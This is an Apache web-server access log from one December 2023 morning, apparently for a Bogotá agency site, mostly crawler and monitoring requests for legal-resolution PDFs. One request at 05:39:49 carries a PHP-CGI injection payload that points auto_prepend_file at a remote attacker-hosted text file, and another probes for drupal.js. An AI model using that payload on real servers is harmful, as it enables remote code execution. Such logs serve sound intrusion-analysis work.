216.244.66.195 - - [20/Dec/2023:04:41:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3633.pdf HTTP/1.1" 200 654503
201.245.192.253 - - [20/Dec/2023:04:42:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
172.22.2.4 - - [20/Dec/2023:04:40:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:04:43:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:04:41:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60497
216.245.221.92 - - [20/Dec/2023:04:43:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:04:45:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:04:45:08 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61699
201.245.192.253 - - [20/Dec/2023:04:47:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:04:47:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
172.22.2.4 - - [20/Dec/2023:04:46:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Dec/2023:04:48:37 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [20/Dec/2023:04:48:45 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Nuestros%20M%C3%B3dulos.pdf HTTP/1.1" 200 189843
114.119.138.36 - - [20/Dec/2023:04:48:55 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2017/&sort=name&order=desc HTTP/1.1" 200 13943
201.245.192.253 - - [20/Dec/2023:04:49:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:04:47:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60497
212.29.221.111 - - [20/Dec/2023:04:49:17 -0500] "GET /robots.txt HTTP/1.1" 404 1034
212.29.221.111 - - [20/Dec/2023:04:49:18 -0500] "GET / HTTP/1.1" 200 4720
212.29.221.107 - - [20/Dec/2023:04:49:21 -0500] "GET /robots.txt HTTP/1.1" 404 1035
212.29.221.107 - - [20/Dec/2023:04:49:21 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [20/Dec/2023:04:49:58 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [20/Dec/2023:04:51:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.21 - - [20/Dec/2023:04:51:27 -0500] "GET /BLA/resoluciones/AUTOS%202007/1919.pdf HTTP/1.1" 200 90400
172.22.2.4 - - [20/Dec/2023:04:50:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63049
201.245.192.253 - - [20/Dec/2023:04:52:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
157.55.39.49 - - [20/Dec/2023:04:52:22 -0500] "GET /BLA/resoluciones/AUTOS%202023/4418.pdf HTTP/1.1" 200 397091
201.245.192.253 - - [20/Dec/2023:04:53:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [20/Dec/2023:04:53:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:04:52:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [20/Dec/2023:04:54:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0935.pdf HTTP/1.1" 200 70010
172.22.2.4 - - [20/Dec/2023:04:53:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60905
201.245.192.253 - - [20/Dec/2023:04:55:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
157.55.39.59 - - [20/Dec/2023:04:55:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5647.pdf HTTP/1.1" 200 408519
201.245.192.253 - - [20/Dec/2023:04:57:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:04:57:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
216.245.221.92 - - [20/Dec/2023:04:58:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:04:59:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
207.46.13.92 - - [20/Dec/2023:04:59:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4366.pdf HTTP/1.1" 304 -
172.22.2.4 - - [20/Dec/2023:04:58:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.95.24 - - [20/Dec/2023:05:00:13 -0500] "GET /distrito-recupera-mas-de-20-kilogramos-de-musgo-y-dos-aves-silvestres.html HTTP/1.1" 200 857
66.220.149.5 - - [20/Dec/2023:05:00:26 -0500] "GET /distrito-recupera-mas-de-20-kilogramos-de-musgo-y-dos-aves-silvestres.html HTTP/1.1" 200 857
66.220.149.21 - - [20/Dec/2023:05:00:26 -0500] "GET /distrito-recupera-mas-de-20-kilogramos-de-musgo-y-dos-aves-silvestres.html HTTP/1.1" 200 857
173.252.79.5 - - [20/Dec/2023:05:00:37 -0500] "GET /distrito-recupera-mas-de-20-kilogramos-de-musgo-y-dos-aves-silvestres.html HTTP/1.1" 200 857
172.22.2.4 - - [20/Dec/2023:04:59:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60497
201.245.192.253 - - [20/Dec/2023:05:01:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:05:02:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:05:03:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [20/Dec/2023:05:03:37 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [20/Dec/2023:05:03:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3772.pdf HTTP/1.1" 200 688124
207.46.13.128 - - [20/Dec/2023:05:04:12 -0500] "GET /BLA/resoluciones/AUTOS%202023/5600.pdf HTTP/1.1" 200 440838
201.245.192.253 - - [20/Dec/2023:05:05:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:05:04:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:05:04:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60905
201.245.192.253 - - [20/Dec/2023:05:07:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:05:07:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
216.245.221.92 - - [20/Dec/2023:05:08:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:09:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.36.71 - - [20/Dec/2023:05:09:49 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
47.128.36.71 - - [20/Dec/2023:05:09:49 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.36.71 - - [20/Dec/2023:05:09:48 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007%2FRES%202007%20901%20AL%201000%2F&order=desc&sort=name HTTP/1.1" 200 26733
207.46.13.141 - - [20/Dec/2023:05:10:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/2081.pdf HTTP/1.1" 304 -
47.128.39.30 - - [20/Dec/2023:05:10:10 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007%2FRES%202007%202001%20AL%202100%2F&order=desc&sort=name HTTP/1.1" 200 26869
47.128.39.30 - - [20/Dec/2023:05:10:11 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.39.30 - - [20/Dec/2023:05:10:11 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
201.245.192.253 - - [20/Dec/2023:05:11:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.19 - - [20/Dec/2023:05:11:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3498.pdf HTTP/1.1" 200 388734
172.22.2.4 - - [20/Dec/2023:05:09:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:12:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
34.174.152.29 - - [20/Dec/2023:05:12:20 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202017/0520.pdf HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:05:10:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58562
201.245.192.253 - - [20/Dec/2023:05:13:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [20/Dec/2023:05:13:37 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [20/Dec/2023:05:14:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4085.pdf HTTP/1.1" 200 678938
201.245.192.253 - - [20/Dec/2023:05:15:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
199.16.157.182 - - [20/Dec/2023:05:16:22 -0500] "GET /images/presentaci%C3%B3n%20convenci%C3%B3n.jpg HTTP/1.1" 404 1034
201.245.192.253 - - [20/Dec/2023:05:16:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38482
201.245.192.253 - - [20/Dec/2023:05:16:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36331
216.244.66.195 - - [20/Dec/2023:05:16:52 -0500] "GET /BLA/resoluciones/AUTOS%202023/3693.pdf HTTP/1.1" 200 454530
201.245.192.253 - - [20/Dec/2023:05:17:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:05:17:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
172.22.2.4 - - [20/Dec/2023:05:15:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.51 - - [20/Dec/2023:05:17:47 -0500] "GET /BLA/resoluciones/AUTOS%202023/4723.pdf HTTP/1.1" 200 726361
172.22.2.4 - - [20/Dec/2023:05:16:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60497
66.249.66.21 - - [20/Dec/2023:05:18:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2017.pdf HTTP/1.1" 200 339030
216.245.221.92 - - [20/Dec/2023:05:18:37 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Dec/2023:05:18:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2301.pdf HTTP/1.1" 200 364818
66.249.66.19 - - [20/Dec/2023:05:18:40 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/xxxxx%20incendios/sitio/xtras/2.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [20/Dec/2023:05:19:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:05:19:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/02492.pdf HTTP/1.1" 200 278742
216.244.66.195 - - [20/Dec/2023:05:19:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3210.pdf HTTP/1.1" 200 254323
216.244.66.195 - - [20/Dec/2023:05:20:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3506.pdf HTTP/1.1" 200 297139
201.245.192.253 - - [20/Dec/2023:05:20:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38482
201.245.192.253 - - [20/Dec/2023:05:20:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36331
66.249.66.20 - - [20/Dec/2023:05:20:45 -0500] "GET /BLA/resoluciones/AUTOS%202008/1748.pdf HTTP/1.1" 200 186219
172.22.2.4 - - [20/Dec/2023:05:20:57 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000007%20DEL%2025%20DE%20JULIO%20DEL%202022.pdf HTTP/1.1" 304 -
201.245.192.253 - - [20/Dec/2023:05:21:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:05:21:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3785.pdf HTTP/1.1" 200 606959
216.244.66.195 - - [20/Dec/2023:05:21:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3888.pdf HTTP/1.1" 200 386267
201.245.192.253 - - [20/Dec/2023:05:22:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
66.249.66.21 - - [20/Dec/2023:05:22:35 -0500] "GET /BLA/resoluciones/AUTOS%202008/2573.pdf HTTP/1.1" 200 99682
114.119.134.146 - - [20/Dec/2023:05:22:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2020/&sort=name&order=desc HTTP/1.1" 200 13881
201.245.192.253 - - [20/Dec/2023:05:23:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:05:21:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Dec/2023:05:23:37 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.154 - - [20/Dec/2023:05:23:54 -0500] "GET /BLA/resoluciones/AUTOS%202023/3895.pdf HTTP/1.1" 200 969072
172.22.2.4 - - [20/Dec/2023:05:22:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58562
201.245.192.253 - - [20/Dec/2023:05:25:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:05:26:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38482
201.245.192.253 - - [20/Dec/2023:05:26:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36331
201.245.192.253 - - [20/Dec/2023:05:27:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:05:27:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
216.245.221.92 - - [20/Dec/2023:05:28:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:29:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:05:27:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:05:28:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58562
66.249.66.20 - - [20/Dec/2023:05:30:15 -0500] "GET /BLA/resoluciones/AUTOS%202009/3399.pdf HTTP/1.1" 200 98068
201.245.192.253 - - [20/Dec/2023:05:30:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38482
201.245.192.253 - - [20/Dec/2023:05:30:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36331
201.245.192.253 - - [20/Dec/2023:05:31:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:05:32:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:05:33:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [20/Dec/2023:05:33:37 -0500] "HEAD / HTTP/1.1" 200 -
212.235.15.144 - - [20/Dec/2023:05:34:21 -0500] "GET /robots.txt HTTP/1.1" 404 1034
212.235.15.144 - - [20/Dec/2023:05:34:21 -0500] "GET /las-tres-caminatas-para-cerrar-el-ano-entre-la-naturaleza.html HTTP/1.1" 200 776
172.22.2.4 - - [20/Dec/2023:05:33:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:35:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:05:34:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58562
216.244.66.195 - - [20/Dec/2023:05:36:20 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [20/Dec/2023:05:36:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38482
201.245.192.253 - - [20/Dec/2023:05:36:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36331
201.245.192.253 - - [20/Dec/2023:05:37:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:05:37:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
207.46.13.107 - - [20/Dec/2023:05:37:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/4690.pdf HTTP/1.1" 200 484897
213.180.203.65 - - [20/Dec/2023:05:37:53 -0500] "GET /robots.txt HTTP/1.1" 404 1034
95.108.213.169 - - [20/Dec/2023:05:37:53 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
216.245.221.92 - - [20/Dec/2023:05:38:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:39:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
94.156.71.225 - - [20/Dec/2023:05:39:49 -0500] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://happymatures.com/chm/000/003/002/amax.txt HTTP/1.1" 404 1018
201.245.192.253 - - [20/Dec/2023:05:40:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38482
201.245.192.253 - - [20/Dec/2023:05:40:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36331
172.22.2.4 - - [20/Dec/2023:05:39:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:41:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
207.46.13.155 - - [20/Dec/2023:05:41:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2851.pdf HTTP/1.1" 304 -
207.46.13.54 - - [20/Dec/2023:05:41:24 -0500] "GET /BLA/resoluciones/AUTOS%202023/4951.pdf HTTP/1.1" 200 1343258
172.22.2.4 - - [20/Dec/2023:05:39:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58562
201.245.192.253 - - [20/Dec/2023:05:41:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:05:43:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.119.74 - - [20/Dec/2023:05:43:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007%2FRES%202007%202401%20AL%202500%2F&order=asc&sort=date HTTP/1.1" 200 26869
47.128.119.74 - - [20/Dec/2023:05:43:05 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
47.128.119.74 - - [20/Dec/2023:05:43:05 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
216.245.221.92 - - [20/Dec/2023:05:43:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:45:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
208.100.26.233 - - [20/Dec/2023:05:46:15 -0500] "HEAD /core/misc/drupal.js HTTP/1.1" 404 -
208.100.26.233 - - [20/Dec/2023:05:46:15 -0500] "HEAD /misc/drupal.js HTTP/1.1" 404 -
172.22.2.4 - - [20/Dec/2023:05:44:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:46:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:05:47:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:05:45:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58562
216.245.221.92 - - [20/Dec/2023:05:48:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:49:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
157.55.39.48 - - [20/Dec/2023:05:49:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4529.pdf HTTP/1.1" 200 343226
116.202.20.140 - - [20/Dec/2023:05:49:29 -0500] "GET / HTTP/1.1" 200 4720
116.202.20.140 - - [20/Dec/2023:05:49:30 -0500] "GET / HTTP/1.1" 200 319
66.249.66.21 - - [20/Dec/2023:05:50:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1451.pdf HTTP/1.1" 200 356600
201.245.192.253 - - [20/Dec/2023:05:51:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:05:51:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
172.22.2.4 - - [20/Dec/2023:05:50:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:53:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
199.16.157.183 - - [20/Dec/2023:05:53:08 -0500] "GET /images/Adopcion-gatos-y-perros-en-bogota-abril-23.jpeg HTTP/1.1" 200 68661
172.22.2.4 - - [20/Dec/2023:05:51:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60497
66.249.66.77 - - [20/Dec/2023:05:53:32 -0500] "GET /robots.txt HTTP/1.1" 404 1035
66.249.66.76 - - [20/Dec/2023:05:53:33 -0500] "GET /portaldeninos/2018/06/06/hola-mundo-3-2-2/ HTTP/1.1" 200 94319
216.245.221.92 - - [20/Dec/2023:05:53:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:05:54:36 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 304 -
157.55.39.48 - - [20/Dec/2023:05:54:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1329.pdf HTTP/1.1" 200 481901
201.245.192.253 - - [20/Dec/2023:05:55:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
157.55.39.59 - - [20/Dec/2023:05:55:58 -0500] "GET /BLA/resoluciones/AUTOS%202023/5485.pdf HTTP/1.1" 200 973536
201.245.192.253 - - [20/Dec/2023:05:56:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:05:57:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:05:56:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Dec/2023:05:58:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:05:59:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
